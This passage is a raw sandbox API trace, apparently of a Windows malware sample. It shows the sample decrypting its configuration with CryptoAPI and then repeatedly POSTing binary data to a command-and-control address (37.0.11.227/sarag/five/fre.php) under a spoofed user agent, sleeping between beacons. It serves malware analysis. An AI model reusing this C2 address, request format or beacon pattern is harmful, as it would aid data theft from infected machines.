(in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0200.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.682] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0200.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.683] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0200.683] GetProcessHeap () returned 0x690000 [0200.683] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0200.684] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.684] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0200.685] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.685] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0200.686] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.686] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0200.687] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.687] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0200.687] GetProcessHeap () returned 0x690000 [0200.687] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0200.687] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0200.687] GetProcessHeap () returned 0x690000 [0200.688] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0200.722] GetProcessHeap () returned 0x690000 [0200.722] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0200.722] GetProcessHeap () returned 0x690000 [0200.723] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0200.723] GetProcessHeap () returned 0x690000 [0200.723] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0200.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.724] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0200.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.732] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0200.737] GetProcessHeap () returned 0x690000 [0200.737] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0200.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.738] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0200.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.739] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0200.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.741] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0200.741] GetProcessHeap () returned 0x690000 [0200.742] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0200.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.742] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0200.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.743] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0200.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.744] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0200.744] GetProcessHeap () returned 0x690000 [0200.744] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0200.745] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.745] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0200.746] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.746] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0200.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.748] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0200.748] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.749] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0200.749] GetProcessHeap () returned 0x690000 [0200.749] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0200.749] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b2ec0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0200.749] GetProcessHeap () returned 0x690000 [0200.749] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab450 [0200.749] socket (af=2, type=1, protocol=6) returned 0x448 [0200.749] connect (s=0x448, name=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0200.777] FreeAddrInfoW (pAddrInfo=0x6b2ec0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0200.777] GetProcessHeap () returned 0x690000 [0200.777] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0200.777] GetProcessHeap () returned 0x690000 [0200.777] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0200.778] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0200.779] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0200.779] GetProcessHeap () returned 0x690000 [0200.779] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0200.779] GetProcessHeap () returned 0x690000 [0200.780] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0200.780] GetProcessHeap () returned 0x690000 [0200.780] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0200.780] GetProcessHeap () returned 0x690000 [0200.780] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0200.781] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0200.781] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0200.781] GetProcessHeap () returned 0x690000 [0200.781] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0200.781] GetProcessHeap () returned 0x690000 [0200.782] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0200.782] send (s=0x448, buf=0x6abd08*, len=242, flags=0) returned 242 [0200.783] send (s=0x448, buf=0x6aba40*, len=159, flags=0) returned 159 [0200.783] GetProcessHeap () returned 0x690000 [0200.783] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0200.788] recv (in: s=0x448, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0200.857] GetProcessHeap () returned 0x690000 [0200.858] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0200.858] GetProcessHeap () returned 0x690000 [0200.858] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0200.858] GetProcessHeap () returned 0x690000 [0200.859] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0200.859] GetProcessHeap () returned 0x690000 [0200.859] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0200.859] closesocket (s=0x448) returned 0 [0200.860] GetProcessHeap () returned 0x690000 [0200.860] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab450 | out: hHeap=0x690000) returned 1 [0200.860] GetProcessHeap () returned 0x690000 [0200.861] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0200.861] GetProcessHeap () returned 0x690000 [0200.861] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0200.861] GetProcessHeap () returned 0x690000 [0200.861] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0200.862] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x12d4) returned 0x448 [0200.864] Sleep (dwMilliseconds=0xea60) [0200.869] GetProcessHeap () returned 0x690000 [0200.869] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0200.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.870] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0200.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.902] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0200.911] GetProcessHeap () returned 0x690000 [0200.911] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0200.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.912] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0200.912] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.913] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0200.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.914] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0200.914] GetProcessHeap () returned 0x690000 [0200.914] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0200.915] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.915] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0201.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0201.120] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0201.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0201.124] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0201.124] GetProcessHeap () returned 0x690000 [0201.124] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0201.126] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0201.127] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0201.129] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0201.130] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0201.133] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0201.137] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0201.139] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0201.140] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0201.140] GetProcessHeap () returned 0x690000 [0201.141] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0201.336] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0201.336] GetProcessHeap () returned 0x690000 [0201.343] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0201.344] GetProcessHeap () returned 0x690000 [0201.345] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0201.345] GetProcessHeap () returned 0x690000 [0201.346] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0201.346] GetProcessHeap () returned 0x690000 [0201.346] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0201.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0201.348] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0201.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0201.632] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0201.883] GetProcessHeap () returned 0x690000 [0201.883] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0201.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0201.884] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0201.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0201.886] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0201.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0201.887] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0201.887] GetProcessHeap () returned 0x690000 [0201.888] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0201.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0201.911] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0201.912] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0201.913] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0201.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0201.914] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0201.914] GetProcessHeap () returned 0x690000 [0201.914] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0201.915] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0201.915] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0201.916] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0201.916] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0201.917] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0201.919] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0201.920] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0201.920] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0201.920] GetProcessHeap () returned 0x690000 [0201.921] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0201.960] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b2a10*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae9a0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0201.960] GetProcessHeap () returned 0x690000 [0201.960] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0201.960] socket (af=2, type=1, protocol=6) returned 0x44c [0201.968] connect (s=0x44c, name=0x6ae9a0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0202.028] FreeAddrInfoW (pAddrInfo=0x6b2a10*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae9a0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0202.033] GetProcessHeap () returned 0x690000 [0202.033] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0202.033] GetProcessHeap () returned 0x690000 [0202.034] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0202.034] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0202.036] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0202.036] GetProcessHeap () returned 0x690000 [0202.036] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0040 [0202.036] GetProcessHeap () returned 0x690000 [0202.037] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0202.037] GetProcessHeap () returned 0x690000 [0202.037] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0202.037] GetProcessHeap () returned 0x690000 [0202.037] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0202.040] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0202.042] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0202.042] GetProcessHeap () returned 0x690000 [0202.042] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0202.043] GetProcessHeap () returned 0x690000 [0202.043] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0202.043] send (s=0x44c, buf=0x6abd08*, len=242, flags=0) returned 242 [0202.045] send (s=0x44c, buf=0x6aba40*, len=159, flags=0) returned 159 [0202.046] GetProcessHeap () returned 0x690000 [0202.046] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0202.046] recv (in: s=0x44c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0202.146] GetProcessHeap () returned 0x690000 [0202.147] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0202.147] GetProcessHeap () returned 0x690000 [0202.147] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0202.148] GetProcessHeap () returned 0x690000 [0202.148] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0040 | out: hHeap=0x690000) returned 1 [0202.148] GetProcessHeap () returned 0x690000 [0202.149] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0202.149] closesocket (s=0x44c) returned 0 [0202.151] GetProcessHeap () returned 0x690000 [0202.151] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0202.151] GetProcessHeap () returned 0x690000 [0202.151] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0202.152] GetProcessHeap () returned 0x690000 [0202.152] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0202.152] GetProcessHeap () returned 0x690000 [0202.153] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0202.177] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x12d8) returned 0x44c [0202.179] Sleep (dwMilliseconds=0xea60) [0202.181] GetProcessHeap () returned 0x690000 [0202.181] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0202.182] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.183] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0202.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.231] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0202.538] GetProcessHeap () returned 0x690000 [0202.538] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0202.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.539] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0202.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.540] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0202.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.541] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0202.542] GetProcessHeap () returned 0x690000 [0202.542] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0202.543] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.543] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0202.545] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.546] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0202.547] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0202.547] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0202.547] GetProcessHeap () returned 0x690000 [0202.547] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0202.548] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0202.548] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0202.549] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0202.551] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0202.551] LoadLibraryW (lpLibFileName="shlwapi") returned 